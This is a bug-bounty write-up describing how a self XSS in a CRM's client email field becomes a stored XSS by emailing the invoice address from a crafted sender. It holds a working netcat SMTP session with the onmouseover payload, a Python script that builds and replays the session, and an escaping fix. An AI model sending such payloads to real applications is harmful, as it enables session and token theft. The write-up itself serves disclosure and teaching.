If you are reading this you are probably wondering what this is. Is this some kind of joke? The answer is no, and it is not clickbait: this is the story of chaining small issues and pivoting from a self XSS to a fully blown stored XSS.
The journey began when I started hacking on a private program. While doing my research I came across a self XSS issue which they were aware of and which was explicitly out of scope. So I kept digging and started to learn how the app worked; it had a CRM and other related features which are not really important for now. The app had multiple parts, and one of them was client management with the usual functionality: create/delete/modify clients, create/attach invoices, and so on. The self XSS lived in the information fields of the client's view.
By adding a simple ' to the email address I was able to break out of the HTML attribute the field was rendered in and then add my own attributes.
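To make the attribute break-out concrete, here is an added example (my own illustration, not code from the application or from the original post) of a template that drops the client's email field into a single-quoted attribute unescaped, next to the same template with contextual output encoding. The function names and the minimal attribute tokenizer are mine; the tokenizer mirrors the HTML5 rule that after a quoted attribute value the parser goes straight back to reading an attribute name, even when no space follows, which is exactly why `''onmouseover='...'` works.

```python
import html

# Constructed sample input: the attacker-controlled address from the page's payload.
ATTACKER_EMAIL = "'onmouseover='alert(localStorage.oauth)'@plenumsec.com"


def render_client_email_vulnerable(email):
    """Template that interpolates the field into a single-quoted attribute as-is.
    A lone ' in the value closes the attribute, and everything after it is parsed
    as further attributes on the <input>."""
    return f"<input type='text' name='email' value='{email}'>"


def render_client_email_fixed(email):
    """Same template with contextual output encoding. html.escape(quote=True)
    turns ' into &#x27; and " into &quot;, so the value can never close the
    attribute it sits in."""
    return f"<input type='text' name='email' value='{html.escape(email, quote=True)}'>"


def attribute_names(tag):
    """Return the attribute names a browser would see on a single start tag.
    Minimal model of the HTML tokenizer's attribute states (enough for this
    check, not a full HTML parser): a quoted value ends at the matching quote
    and the parser then immediately reads the next attribute name."""
    names = []
    i = tag.index(" ") + 1          # skip "<input"
    n = len(tag)
    while i < n and tag[i] != ">":
        if tag[i] in " \t\n/":
            i += 1
            continue
        start = i
        while i < n and tag[i] not in "=> \t\n/":
            i += 1
        name = tag[start:i]
        if name:
            names.append(name.lower())
        if i < n and tag[i] == "=":
            i += 1
            if i < n and tag[i] in "'\"":
                quote = tag[i]
                end = tag.find(quote, i + 1)
                i = n if end == -1 else end + 1
            else:                   # unquoted value runs to whitespace or '>'
                while i < n and tag[i] not in " \t\n>":
                    i += 1
    return names


if __name__ == "__main__":
    for render in (render_client_email_vulnerable, render_client_email_fixed):
        markup = render(ATTACKER_EMAIL)
        print(markup)
        print("  attributes seen by the browser:", attribute_names(markup))
```

Running it shows the vulnerable rendering gaining an `onmouseover` attribute, while the escaped rendering keeps the whole address inside `value`. Note that the fix is output encoding at the point of rendering; validating the email on the normal client form does not help here, because the address arrives through the inbound-mail path described further down.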
After some more digging I found out that if you send an email to the invoice email address, the app checks whether the sender's address exists in the client database; if it does, a new ticket is created for that client. But what if we send an email from a non-client address? A new client is created alongside the new ticket, with the sender's address stored as the client's email.
Now, since I can control part of the client information (the email address), I need to be able to send really malformed emails, and the easiest way to do that is to talk to the mail server directly with netcat. So I opened a new terminal, looked up the MX record for their email domain, and started building the exploit.
First I had to build a working XSS payload; then I had to figure out which characters break the SMTP syntax and encode them. The final attack, with the resulting address in MAIL FROM, looked something like this:
nc -C mxa.mailgun.org 25
EHLO plenumsec.com
MAIL FROM: <'onmouseover='alert(localStorage.oauth)'@plenumsec.com>
RCPT TO: <email@example.com>
DATA
From: Attacker <'onmouseover='alert(localStorage.oauth)'@plenumsec.com>
To: Victim <firstname.lastname@example.org>
Date: Wed, 26 Sep 2018 14:21:26 -0400

This is a stored xss poc.
.
QUIT
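The netcat session above is typed by hand, and the post does not show which characters had to be encoded or how. The following added example (mine, not the author's tooling) scripts the same exchange: it puts the local part into an RFC 5321 quoted-string when it contains characters outside `atext` (parentheses, spaces, `<`, `>`, `@`, commas and double quotes are not allowed in a bare local part, while `'`, `=` and `.` are), assembles the EHLO/MAIL FROM/RCPT TO/DATA sequence with CRLF line endings and RFC 5321 dot-stuffing, and optionally replays it against an MX while reading each reply. Quoting the local part is my choice for making the address syntactically valid; the page's payload sends the parentheses bare, and whether an MTA accepts that is MTA-specific. `build_smtp_commands`, `quote_local_part`, `read_reply` and `send_session` are hypothetical helper names, and the sample inputs are constructed.

```python
import socket
import string

# RFC 5321 / RFC 5322 "atext": the characters allowed in a bare (Dot-string) local part.
ATEXT = set(string.ascii_letters + string.digits + "!#$%&'*+-/=?^_`{|}~")


def quote_local_part(local):
    """Return the local part in a form an RFC 5321 server must accept.
    A bare Dot-string may only contain atext and single dots; anything else has
    to be wrapped in a Quoted-string with backslash and double quote escaped.
    Control characters cannot be represented at all."""
    if any(ord(c) < 32 or ord(c) == 127 for c in local):
        raise ValueError("control characters are not representable in a local part")
    plain = all(c in ATEXT or c == "." for c in local)
    if plain and local and not local.startswith(".") and not local.endswith(".") and ".." not in local:
        return local
    escaped = local.replace("\\", "\\\\").replace('"', '\\"')
    return f'"{escaped}"'


def build_smtp_commands(helo, from_local, from_domain, rcpt_to, headers, body):
    """Build the client side of the session as a list of strings, one per command.
    The DATA payload is one entry: headers, blank line, dot-stuffed body, and the
    terminating '.'. Every entry is sent followed by CRLF, as `nc -C` would."""
    sender = f"{quote_local_part(from_local)}@{from_domain}"
    header_lines = [f"{k}: {v}" for k, v in headers]
    stuffed = []
    for line in body.splitlines():
        # RFC 5321 4.5.2: a body line starting with '.' gets a second '.' prepended
        # so it cannot be mistaken for the end-of-data marker.
        stuffed.append("." + line if line.startswith(".") else line)
    data_block = "\r\n".join(header_lines + [""] + stuffed + ["."])
    return [f"EHLO {helo}", f"MAIL FROM:<{sender}>", f"RCPT TO:<{rcpt_to}>", "DATA", data_block, "QUIT"]


def read_reply(sock):
    """Read one SMTP reply, including multi-line ones ('250-...' lines end with '250 ...')."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
        last = buf.rstrip(b"\r\n").split(b"\r\n")[-1]
        if len(last) >= 4 and last[3:4] == b" ":
            break
    return buf.decode("ascii", "replace")


def send_session(host, commands, port=25, timeout=10.0):
    """Replay the commands against an MX one at a time, waiting for each reply.
    Returns the banner plus one reply per command so a 5xx on MAIL FROM is visible.
    Network-facing; not exercised by the offline check."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        replies.append(read_reply(s))            # 220 banner
        for cmd in commands:
            s.sendall(cmd.encode("ascii") + b"\r\n")
            replies.append(read_reply(s))
    return replies


if __name__ == "__main__":
    # Constructed inputs mirroring the page's payload; the target MX is not contacted here.
    payload_local = "'onmouseover='alert(localStorage.oauth)'"
    sender = f"{quote_local_part(payload_local)}@plenumsec.com"
    cmds = build_smtp_commands(
        "plenumsec.com", payload_local, "plenumsec.com", "email@example.com",
        [("From", f"Attacker <{sender}>"), ("To", "Victim <firstname.lastname@example.org>"),
         ("Date", "Wed, 26 Sep 2018 14:21:26 -0400")],
        "This is a stored xss poc.",
    )
    print("\r\n".join(cmds))
```

The `From:` header must carry the same crafted address as `MAIL FROM`, because which of the two the application copies into the new client record is not known from the outside; the script above uses it in both. If the MTA answers `501` or `553` to `MAIL FROM`, the quoted form is the one to try next, and a `250` there followed by `250` to `DATA` means the payload has reached the application's parser.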
Now an attacker would just wait for an employee to visit the client management page or perform any action that renders the attacker's email address. The invoice mailbox address was completely guessable, so the attack could be automated and run against other targets by brute-forcing the address.
One would argue that this attack could have been avoided by implementing SPF, but SPF only checks that the sending host is authorised for the sender's domain; an attacker who controls the DNS of the domain in MAIL FROM passes SPF with exactly this payload. The fix that actually closes the hole is contextual output encoding of the client fields (and validating addresses before auto-creating clients from inbound mail). Still, sometimes security is not convenient for businesses, so they make compromises.
Thanks for reading,